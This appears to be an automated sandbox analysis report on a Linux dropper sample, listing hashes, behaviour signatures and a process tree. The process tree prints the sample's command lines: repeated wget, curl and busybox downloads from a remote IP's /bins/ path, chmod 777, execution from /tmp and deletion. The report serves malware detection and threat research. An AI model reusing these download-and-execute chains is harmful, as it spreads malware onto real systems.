Analysis
- max time kernel: 45s
- max time network: 76s
- platform: debian-9_armhf
- resource: debian9-armhf-20240611-en
- resource tags: arch:armhf, image:debian9-armhf-20240611-en, kernel:4.9.0-13-armmp-lpae, locale:en-us, os:debian-9-armhf, system
- submitted: 09-11-2024 16:23
Static task
- static1
Behavioral tasks
- behavioral1: sample bf547cdc7a9de06658e0b130057c562fbfc38515ec8e86c54d6bad1c22eacd8bN, resource ubuntu1804-amd64-20240611-en
- behavioral2: sample bf547cdc7a9de06658e0b130057c562fbfc38515ec8e86c54d6bad1c22eacd8bN, resource debian9-armhf-20240611-en
- behavioral3: sample bf547cdc7a9de06658e0b130057c562fbfc38515ec8e86c54d6bad1c22eacd8bN, resource debian9-mipsbe-20240611-en
- behavioral4: sample bf547cdc7a9de06658e0b130057c562fbfc38515ec8e86c54d6bad1c22eacd8bN, resource debian9-mipsel-20240611-en
General
- Target: bf547cdc7a9de06658e0b130057c562fbfc38515ec8e86c54d6bad1c22eacd8bN
- Size: 10KB
- MD5: 17fadac61f699e8688b92fa8096ee980
- SHA1: 83b7df16777df7eb876af7062643a8d30cddb2ca
- SHA256: bf547cdc7a9de06658e0b130057c562fbfc38515ec8e86c54d6bad1c22eacd8b
- SHA512: 59ce1a1990e0f04de41aac37d50304d031af6b8f68ad765cdb43e9ebfc5bb1b29ed072b24adf1cfa3c505e8bd4bef1c219324a8941fd95166688ed33e590aedd
- SSDEEP: 192:+iVAFfHv6mhWd19zxz5zN2KBd2fHv6mS1Pzxz5zN2K1:+iVAFfHv6mhWdPdlN2KBd2fHv6mShdlX
Malware Config
Signatures
- File and Directory Permissions Modification 1 TTPs 20 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes: chmod (20 instances), PIDs 673, 716, 738, 800, 841, 835, 847, 855, 861, 867, 691, 794, 806, 812, 820, 759, 780, 786, 829, 873
- Executes dropped EXE 20 IoCs
Processes (PID: process, each executed from /tmp/<process>):
674: Rgqkovkducq3fGzvTPq7wBvXdRpFtBGn5p
693: pqxWChoLxeAIHjv2HiWo4kCcXaYHELJ1U5
719: dxe5Rdi3K4dhOZSxAbaQYx6ITTmcKUnuWY
739: p7PPU1eGIjR5080ukiz1bpBPfE9PJRwpNp
760: Y3BLHR7G3XNpADz6u0rPW86aWrcya9Uvq7
781: usSwJY1CvpvP4oBC6p2n2UOulgjk3DLDQO
787: CuxEGmaojd5yxu81G3tEjnF17QChWrXZvk
795: tMzOTGU5viRhlyCISkxBFzQNvTZBftm1nS
801: S5DFRTHTeId6MC1OsaykfRC5cK3vdT6Zqx
807: NISnLCGBPIXkpcsa0OAz5KbY2Oe0QvNTBr
813: MTlIirGKPb0g4OKsaUQYzJG4z3T6D155jO
821: uknJs8UrJUFqef6OSVQ7mNdvQvDdhFKYbs
830: 4nW9CtAxkzS4EabP6bMCCi30PSp99g9UBZ
836: oKtvaweheph7X1ZnhMEDIhYBmE2vVx2E9N
842: usSwJY1CvpvP4oBC6p2n2UOulgjk3DLDQO
848: CuxEGmaojd5yxu81G3tEjnF17QChWrXZvk
856: dxe5Rdi3K4dhOZSxAbaQYx6ITTmcKUnuWY
862: p7PPU1eGIjR5080ukiz1bpBPfE9PJRwpNp
868: Y3BLHR7G3XNpADz6u0rPW86aWrcya9Uvq7
874: tMzOTGU5viRhlyCISkxBFzQNvTZBftm1nS
- Checks CPU configuration 1 TTPs 20 IoCs
Checks CPU information that indicates whether the system is a virtual machine.
Processes: curl (20 instances); each opened /proc/cpuinfo for reading (20 IoCs).
- Reads runtime system information
Processes: curl (20 instances); each opened /proc/self/auxv and /proc/sys/crypto/fips_enabled for reading (40 IoCs, 20 per file).
- Writes file to tmp directory 20 IoCs
Malware often drops required files in the /tmp directory.
Processes: curl (20 instances). Files opened for modification (20 IoCs over 14 distinct paths; dxe5Rdi3K4dhOZSxAbaQYx6ITTmcKUnuWY, p7PPU1eGIjR5080ukiz1bpBPfE9PJRwpNp, usSwJY1CvpvP4oBC6p2n2UOulgjk3DLDQO, tMzOTGU5viRhlyCISkxBFzQNvTZBftm1nS, CuxEGmaojd5yxu81G3tEjnF17QChWrXZvk and Y3BLHR7G3XNpADz6u0rPW86aWrcya9Uvq7 are each recorded twice):
/tmp/4nW9CtAxkzS4EabP6bMCCi30PSp99g9UBZ
/tmp/usSwJY1CvpvP4oBC6p2n2UOulgjk3DLDQO
/tmp/p7PPU1eGIjR5080ukiz1bpBPfE9PJRwpNp
/tmp/pqxWChoLxeAIHjv2HiWo4kCcXaYHELJ1U5
/tmp/dxe5Rdi3K4dhOZSxAbaQYx6ITTmcKUnuWY
/tmp/MTlIirGKPb0g4OKsaUQYzJG4z3T6D155jO
/tmp/NISnLCGBPIXkpcsa0OAz5KbY2Oe0QvNTBr
/tmp/uknJs8UrJUFqef6OSVQ7mNdvQvDdhFKYbs
/tmp/oKtvaweheph7X1ZnhMEDIhYBmE2vVx2E9N
/tmp/tMzOTGU5viRhlyCISkxBFzQNvTZBftm1nS
/tmp/Y3BLHR7G3XNpADz6u0rPW86aWrcya9Uvq7
/tmp/S5DFRTHTeId6MC1OsaykfRC5cK3vdT6Zqx
/tmp/Rgqkovkducq3fGzvTPq7wBvXdRpFtBGn5p
/tmp/CuxEGmaojd5yxu81G3tEjnF17QChWrXZvk
Processes
Each entry is listed as executable (PID): command line, with the signatures it triggered in brackets. Every process below the first one is a direct child of PID 642.
- /tmp/bf547cdc7a9de06658e0b130057c562fbfc38515ec8e86c54d6bad1c22eacd8bN (PID 642): /tmp/bf547cdc7a9de06658e0b130057c562fbfc38515ec8e86c54d6bad1c22eacd8bN
  - /bin/rm (PID 644): /bin/rm bins.sh
  - /usr/bin/wget (PID 646): wget http://216.126.231.240/bins/Rgqkovkducq3fGzvTPq7wBvXdRpFtBGn5p
  - /usr/bin/curl (PID 664): curl -O http://216.126.231.240/bins/Rgqkovkducq3fGzvTPq7wBvXdRpFtBGn5p [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  - /bin/busybox (PID 671): /bin/busybox wget http://216.126.231.240/bins/Rgqkovkducq3fGzvTPq7wBvXdRpFtBGn5p
  - /bin/chmod (PID 673): chmod 777 Rgqkovkducq3fGzvTPq7wBvXdRpFtBGn5p [File and Directory Permissions Modification]
  - /tmp/Rgqkovkducq3fGzvTPq7wBvXdRpFtBGn5p (PID 674): ./Rgqkovkducq3fGzvTPq7wBvXdRpFtBGn5p [Executes dropped EXE]
  - /bin/rm (PID 675): rm Rgqkovkducq3fGzvTPq7wBvXdRpFtBGn5p
  - /usr/bin/wget (PID 676): wget http://216.126.231.240/bins/pqxWChoLxeAIHjv2HiWo4kCcXaYHELJ1U5
  - /usr/bin/curl (PID 677): curl -O http://216.126.231.240/bins/pqxWChoLxeAIHjv2HiWo4kCcXaYHELJ1U5 [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  - /bin/busybox (PID 686): /bin/busybox wget http://216.126.231.240/bins/pqxWChoLxeAIHjv2HiWo4kCcXaYHELJ1U5
  - /bin/chmod (PID 691): chmod 777 pqxWChoLxeAIHjv2HiWo4kCcXaYHELJ1U5 [File and Directory Permissions Modification]
  - /tmp/pqxWChoLxeAIHjv2HiWo4kCcXaYHELJ1U5 (PID 693): ./pqxWChoLxeAIHjv2HiWo4kCcXaYHELJ1U5 [Executes dropped EXE]
  - /bin/rm (PID 694): rm pqxWChoLxeAIHjv2HiWo4kCcXaYHELJ1U5
  - /usr/bin/wget (PID 695): wget http://216.126.231.240/bins/dxe5Rdi3K4dhOZSxAbaQYx6ITTmcKUnuWY
  - /usr/bin/curl (PID 702): curl -O http://216.126.231.240/bins/dxe5Rdi3K4dhOZSxAbaQYx6ITTmcKUnuWY [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  - /bin/busybox (PID 710): /bin/busybox wget http://216.126.231.240/bins/dxe5Rdi3K4dhOZSxAbaQYx6ITTmcKUnuWY
  - /bin/chmod (PID 716): chmod 777 dxe5Rdi3K4dhOZSxAbaQYx6ITTmcKUnuWY [File and Directory Permissions Modification]
  - /tmp/dxe5Rdi3K4dhOZSxAbaQYx6ITTmcKUnuWY (PID 719): ./dxe5Rdi3K4dhOZSxAbaQYx6ITTmcKUnuWY [Executes dropped EXE]
  - /bin/rm (PID 721): rm dxe5Rdi3K4dhOZSxAbaQYx6ITTmcKUnuWY
  - /usr/bin/wget (PID 722): wget http://216.126.231.240/bins/p7PPU1eGIjR5080ukiz1bpBPfE9PJRwpNp
  - /usr/bin/curl (PID 731): curl -O http://216.126.231.240/bins/p7PPU1eGIjR5080ukiz1bpBPfE9PJRwpNp [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  - /bin/busybox (PID 737): /bin/busybox wget http://216.126.231.240/bins/p7PPU1eGIjR5080ukiz1bpBPfE9PJRwpNp
  - /bin/chmod (PID 738): chmod 777 p7PPU1eGIjR5080ukiz1bpBPfE9PJRwpNp [File and Directory Permissions Modification]
  - /tmp/p7PPU1eGIjR5080ukiz1bpBPfE9PJRwpNp (PID 739): ./p7PPU1eGIjR5080ukiz1bpBPfE9PJRwpNp [Executes dropped EXE]
  - /bin/rm (PID 740): rm p7PPU1eGIjR5080ukiz1bpBPfE9PJRwpNp
  - /usr/bin/wget (PID 741): wget http://216.126.231.240/bins/Y3BLHR7G3XNpADz6u0rPW86aWrcya9Uvq7
  - /usr/bin/curl (PID 745): curl -O http://216.126.231.240/bins/Y3BLHR7G3XNpADz6u0rPW86aWrcya9Uvq7 [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  - /bin/busybox (PID 753): /bin/busybox wget http://216.126.231.240/bins/Y3BLHR7G3XNpADz6u0rPW86aWrcya9Uvq7
  - /bin/chmod (PID 759): chmod 777 Y3BLHR7G3XNpADz6u0rPW86aWrcya9Uvq7 [File and Directory Permissions Modification]
  - /tmp/Y3BLHR7G3XNpADz6u0rPW86aWrcya9Uvq7 (PID 760): ./Y3BLHR7G3XNpADz6u0rPW86aWrcya9Uvq7 [Executes dropped EXE]
  - /bin/rm (PID 761): rm Y3BLHR7G3XNpADz6u0rPW86aWrcya9Uvq7
  - /usr/bin/wget (PID 763): wget http://216.126.231.240/bins/usSwJY1CvpvP4oBC6p2n2UOulgjk3DLDQO
  - /usr/bin/curl (PID 770): curl -O http://216.126.231.240/bins/usSwJY1CvpvP4oBC6p2n2UOulgjk3DLDQO [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  - /bin/busybox (PID 779): /bin/busybox wget http://216.126.231.240/bins/usSwJY1CvpvP4oBC6p2n2UOulgjk3DLDQO
  - /bin/chmod (PID 780): chmod 777 usSwJY1CvpvP4oBC6p2n2UOulgjk3DLDQO [File and Directory Permissions Modification]
  - /tmp/usSwJY1CvpvP4oBC6p2n2UOulgjk3DLDQO (PID 781): ./usSwJY1CvpvP4oBC6p2n2UOulgjk3DLDQO [Executes dropped EXE]
  - /bin/rm (PID 782): rm usSwJY1CvpvP4oBC6p2n2UOulgjk3DLDQO
  - /usr/bin/wget (PID 783): wget http://216.126.231.240/bins/CuxEGmaojd5yxu81G3tEjnF17QChWrXZvk
  - /usr/bin/curl (PID 784): curl -O http://216.126.231.240/bins/CuxEGmaojd5yxu81G3tEjnF17QChWrXZvk [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  - /bin/busybox (PID 785): /bin/busybox wget http://216.126.231.240/bins/CuxEGmaojd5yxu81G3tEjnF17QChWrXZvk
  - /bin/chmod (PID 786): chmod 777 CuxEGmaojd5yxu81G3tEjnF17QChWrXZvk [File and Directory Permissions Modification]
  - /tmp/CuxEGmaojd5yxu81G3tEjnF17QChWrXZvk (PID 787): ./CuxEGmaojd5yxu81G3tEjnF17QChWrXZvk [Executes dropped EXE]
  - /bin/rm (PID 788): rm CuxEGmaojd5yxu81G3tEjnF17QChWrXZvk
  - /usr/bin/wget (PID 789): wget http://216.126.231.240/bins/tMzOTGU5viRhlyCISkxBFzQNvTZBftm1nS
  - /usr/bin/curl (PID 790): curl -O http://216.126.231.240/bins/tMzOTGU5viRhlyCISkxBFzQNvTZBftm1nS [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  - /bin/busybox (PID 793): /bin/busybox wget http://216.126.231.240/bins/tMzOTGU5viRhlyCISkxBFzQNvTZBftm1nS
  - /bin/chmod (PID 794): chmod 777 tMzOTGU5viRhlyCISkxBFzQNvTZBftm1nS [File and Directory Permissions Modification]
  - /tmp/tMzOTGU5viRhlyCISkxBFzQNvTZBftm1nS (PID 795): ./tMzOTGU5viRhlyCISkxBFzQNvTZBftm1nS [Executes dropped EXE]
  - /bin/rm (PID 796): rm tMzOTGU5viRhlyCISkxBFzQNvTZBftm1nS
  - /usr/bin/wget (PID 797): wget http://216.126.231.240/bins/S5DFRTHTeId6MC1OsaykfRC5cK3vdT6Zqx
  - /usr/bin/curl (PID 798): curl -O http://216.126.231.240/bins/S5DFRTHTeId6MC1OsaykfRC5cK3vdT6Zqx [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  - /bin/busybox (PID 799): /bin/busybox wget http://216.126.231.240/bins/S5DFRTHTeId6MC1OsaykfRC5cK3vdT6Zqx
  - /bin/chmod (PID 800): chmod 777 S5DFRTHTeId6MC1OsaykfRC5cK3vdT6Zqx [File and Directory Permissions Modification]
  - /tmp/S5DFRTHTeId6MC1OsaykfRC5cK3vdT6Zqx (PID 801): ./S5DFRTHTeId6MC1OsaykfRC5cK3vdT6Zqx [Executes dropped EXE]
  - /bin/rm (PID 802): rm S5DFRTHTeId6MC1OsaykfRC5cK3vdT6Zqx
  - /usr/bin/wget (PID 803): wget http://216.126.231.240/bins/NISnLCGBPIXkpcsa0OAz5KbY2Oe0QvNTBr
  - /usr/bin/curl (PID 804): curl -O http://216.126.231.240/bins/NISnLCGBPIXkpcsa0OAz5KbY2Oe0QvNTBr [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  - /bin/busybox (PID 805): /bin/busybox wget http://216.126.231.240/bins/NISnLCGBPIXkpcsa0OAz5KbY2Oe0QvNTBr
  - /bin/chmod (PID 806): chmod 777 NISnLCGBPIXkpcsa0OAz5KbY2Oe0QvNTBr [File and Directory Permissions Modification]
  - /tmp/NISnLCGBPIXkpcsa0OAz5KbY2Oe0QvNTBr (PID 807): ./NISnLCGBPIXkpcsa0OAz5KbY2Oe0QvNTBr [Executes dropped EXE]
  - /bin/rm (PID 808): rm NISnLCGBPIXkpcsa0OAz5KbY2Oe0QvNTBr
  - /usr/bin/wget (PID 809): wget http://216.126.231.240/bins/MTlIirGKPb0g4OKsaUQYzJG4z3T6D155jO
  - /usr/bin/curl (PID 810): curl -O http://216.126.231.240/bins/MTlIirGKPb0g4OKsaUQYzJG4z3T6D155jO [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  - /bin/busybox (PID 811): /bin/busybox wget http://216.126.231.240/bins/MTlIirGKPb0g4OKsaUQYzJG4z3T6D155jO
  - /bin/chmod (PID 812): chmod 777 MTlIirGKPb0g4OKsaUQYzJG4z3T6D155jO [File and Directory Permissions Modification]
  - /tmp/MTlIirGKPb0g4OKsaUQYzJG4z3T6D155jO (PID 813): ./MTlIirGKPb0g4OKsaUQYzJG4z3T6D155jO [Executes dropped EXE]
  - /bin/rm (PID 814): rm MTlIirGKPb0g4OKsaUQYzJG4z3T6D155jO
  - /usr/bin/wget (PID 815): wget http://216.126.231.240/bins/uknJs8UrJUFqef6OSVQ7mNdvQvDdhFKYbs
  - /usr/bin/curl (PID 818): curl -O http://216.126.231.240/bins/uknJs8UrJUFqef6OSVQ7mNdvQvDdhFKYbs [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  - /bin/busybox (PID 819): /bin/busybox wget http://216.126.231.240/bins/uknJs8UrJUFqef6OSVQ7mNdvQvDdhFKYbs
  - /bin/chmod (PID 820): chmod 777 uknJs8UrJUFqef6OSVQ7mNdvQvDdhFKYbs [File and Directory Permissions Modification]
  - /tmp/uknJs8UrJUFqef6OSVQ7mNdvQvDdhFKYbs (PID 821): ./uknJs8UrJUFqef6OSVQ7mNdvQvDdhFKYbs [Executes dropped EXE]
  - /bin/rm (PID 822): rm uknJs8UrJUFqef6OSVQ7mNdvQvDdhFKYbs
  - /usr/bin/wget (PID 823): wget http://216.126.231.240/bins/4nW9CtAxkzS4EabP6bMCCi30PSp99g9UBZ
  - /usr/bin/curl (PID 827): curl -O http://216.126.231.240/bins/4nW9CtAxkzS4EabP6bMCCi30PSp99g9UBZ [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  - /bin/busybox (PID 828): /bin/busybox wget http://216.126.231.240/bins/4nW9CtAxkzS4EabP6bMCCi30PSp99g9UBZ
  - /bin/chmod (PID 829): chmod 777 4nW9CtAxkzS4EabP6bMCCi30PSp99g9UBZ [File and Directory Permissions Modification]
  - /tmp/4nW9CtAxkzS4EabP6bMCCi30PSp99g9UBZ (PID 830): ./4nW9CtAxkzS4EabP6bMCCi30PSp99g9UBZ [Executes dropped EXE]
  - /bin/rm (PID 831): rm 4nW9CtAxkzS4EabP6bMCCi30PSp99g9UBZ
  - /usr/bin/wget (PID 832): wget http://216.126.231.240/bins/oKtvaweheph7X1ZnhMEDIhYBmE2vVx2E9N
  - /usr/bin/curl (PID 833): curl -O http://216.126.231.240/bins/oKtvaweheph7X1ZnhMEDIhYBmE2vVx2E9N [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  - /bin/busybox (PID 834): /bin/busybox wget http://216.126.231.240/bins/oKtvaweheph7X1ZnhMEDIhYBmE2vVx2E9N
  - /bin/chmod (PID 835): chmod 777 oKtvaweheph7X1ZnhMEDIhYBmE2vVx2E9N [File and Directory Permissions Modification]
  - /tmp/oKtvaweheph7X1ZnhMEDIhYBmE2vVx2E9N (PID 836): ./oKtvaweheph7X1ZnhMEDIhYBmE2vVx2E9N [Executes dropped EXE]
  - /bin/rm (PID 837): rm oKtvaweheph7X1ZnhMEDIhYBmE2vVx2E9N
  - /usr/bin/wget (PID 838): wget http://216.126.231.240/bins/usSwJY1CvpvP4oBC6p2n2UOulgjk3DLDQO
  - /usr/bin/curl (PID 839): curl -O http://216.126.231.240/bins/usSwJY1CvpvP4oBC6p2n2UOulgjk3DLDQO [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  - /bin/busybox (PID 840): /bin/busybox wget http://216.126.231.240/bins/usSwJY1CvpvP4oBC6p2n2UOulgjk3DLDQO
  - /bin/chmod (PID 841): chmod 777 usSwJY1CvpvP4oBC6p2n2UOulgjk3DLDQO [File and Directory Permissions Modification]
  - /tmp/usSwJY1CvpvP4oBC6p2n2UOulgjk3DLDQO (PID 842): ./usSwJY1CvpvP4oBC6p2n2UOulgjk3DLDQO [Executes dropped EXE]
  - /bin/rm (PID 843): rm usSwJY1CvpvP4oBC6p2n2UOulgjk3DLDQO
  - /usr/bin/wget (PID 844): wget http://216.126.231.240/bins/CuxEGmaojd5yxu81G3tEjnF17QChWrXZvk
  - /usr/bin/curl (PID 845): curl -O http://216.126.231.240/bins/CuxEGmaojd5yxu81G3tEjnF17QChWrXZvk [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  - /bin/busybox (PID 846): /bin/busybox wget http://216.126.231.240/bins/CuxEGmaojd5yxu81G3tEjnF17QChWrXZvk
  - /bin/chmod (PID 847): chmod 777 CuxEGmaojd5yxu81G3tEjnF17QChWrXZvk [File and Directory Permissions Modification]
  - /tmp/CuxEGmaojd5yxu81G3tEjnF17QChWrXZvk (PID 848): ./CuxEGmaojd5yxu81G3tEjnF17QChWrXZvk [Executes dropped EXE]
  - /bin/rm (PID 849): rm CuxEGmaojd5yxu81G3tEjnF17QChWrXZvk
  - /usr/bin/wget (PID 850): wget http://216.126.231.240/bins/dxe5Rdi3K4dhOZSxAbaQYx6ITTmcKUnuWY
  - /usr/bin/curl (PID 852): curl -O http://216.126.231.240/bins/dxe5Rdi3K4dhOZSxAbaQYx6ITTmcKUnuWY [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  - /bin/busybox (PID 854): /bin/busybox wget http://216.126.231.240/bins/dxe5Rdi3K4dhOZSxAbaQYx6ITTmcKUnuWY
  - /bin/chmod (PID 855): chmod 777 dxe5Rdi3K4dhOZSxAbaQYx6ITTmcKUnuWY [File and Directory Permissions Modification]
  - /tmp/dxe5Rdi3K4dhOZSxAbaQYx6ITTmcKUnuWY (PID 856): ./dxe5Rdi3K4dhOZSxAbaQYx6ITTmcKUnuWY [Executes dropped EXE]
  - /bin/rm (PID 857): rm dxe5Rdi3K4dhOZSxAbaQYx6ITTmcKUnuWY
  - /usr/bin/wget (PID 858): wget http://216.126.231.240/bins/p7PPU1eGIjR5080ukiz1bpBPfE9PJRwpNp
  - /usr/bin/curl (PID 859): curl -O http://216.126.231.240/bins/p7PPU1eGIjR5080ukiz1bpBPfE9PJRwpNp [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  - /bin/busybox (PID 860): /bin/busybox wget http://216.126.231.240/bins/p7PPU1eGIjR5080ukiz1bpBPfE9PJRwpNp
  - /bin/chmod (PID 861): chmod 777 p7PPU1eGIjR5080ukiz1bpBPfE9PJRwpNp [File and Directory Permissions Modification]
  - /tmp/p7PPU1eGIjR5080ukiz1bpBPfE9PJRwpNp (PID 862): ./p7PPU1eGIjR5080ukiz1bpBPfE9PJRwpNp [Executes dropped EXE]
  - /bin/rm (PID 863): rm p7PPU1eGIjR5080ukiz1bpBPfE9PJRwpNp
  - /usr/bin/wget (PID 864): wget http://216.126.231.240/bins/Y3BLHR7G3XNpADz6u0rPW86aWrcya9Uvq7
  - /usr/bin/curl (PID 865): curl -O http://216.126.231.240/bins/Y3BLHR7G3XNpADz6u0rPW86aWrcya9Uvq7 [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  - /bin/busybox (PID 866): /bin/busybox wget http://216.126.231.240/bins/Y3BLHR7G3XNpADz6u0rPW86aWrcya9Uvq7
  - /bin/chmod (PID 867): chmod 777 Y3BLHR7G3XNpADz6u0rPW86aWrcya9Uvq7 [File and Directory Permissions Modification]
  - /tmp/Y3BLHR7G3XNpADz6u0rPW86aWrcya9Uvq7 (PID 868): ./Y3BLHR7G3XNpADz6u0rPW86aWrcya9Uvq7 [Executes dropped EXE]
  - /bin/rm (PID 869): rm Y3BLHR7G3XNpADz6u0rPW86aWrcya9Uvq7
  - /usr/bin/wget (PID 870): wget http://216.126.231.240/bins/tMzOTGU5viRhlyCISkxBFzQNvTZBftm1nS
  - /usr/bin/curl (PID 871): curl -O http://216.126.231.240/bins/tMzOTGU5viRhlyCISkxBFzQNvTZBftm1nS [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  - /bin/busybox (PID 872): /bin/busybox wget http://216.126.231.240/bins/tMzOTGU5viRhlyCISkxBFzQNvTZBftm1nS
  - /bin/chmod (PID 873): chmod 777 tMzOTGU5viRhlyCISkxBFzQNvTZBftm1nS [File and Directory Permissions Modification]
  - /tmp/tMzOTGU5viRhlyCISkxBFzQNvTZBftm1nS (PID 874): ./tMzOTGU5viRhlyCISkxBFzQNvTZBftm1nS [Executes dropped EXE]
  - /bin/rm (PID 875): rm tMzOTGU5viRhlyCISkxBFzQNvTZBftm1nS
  - /usr/bin/wget (PID 876): wget http://216.126.231.240/bins/S5DFRTHTeId6MC1OsaykfRC5cK3vdT6Zqx
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 153B
  MD5: 998368d7c95ea4293237f2320546e440
  SHA1: 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
  SHA256: 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
  SHA512: 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97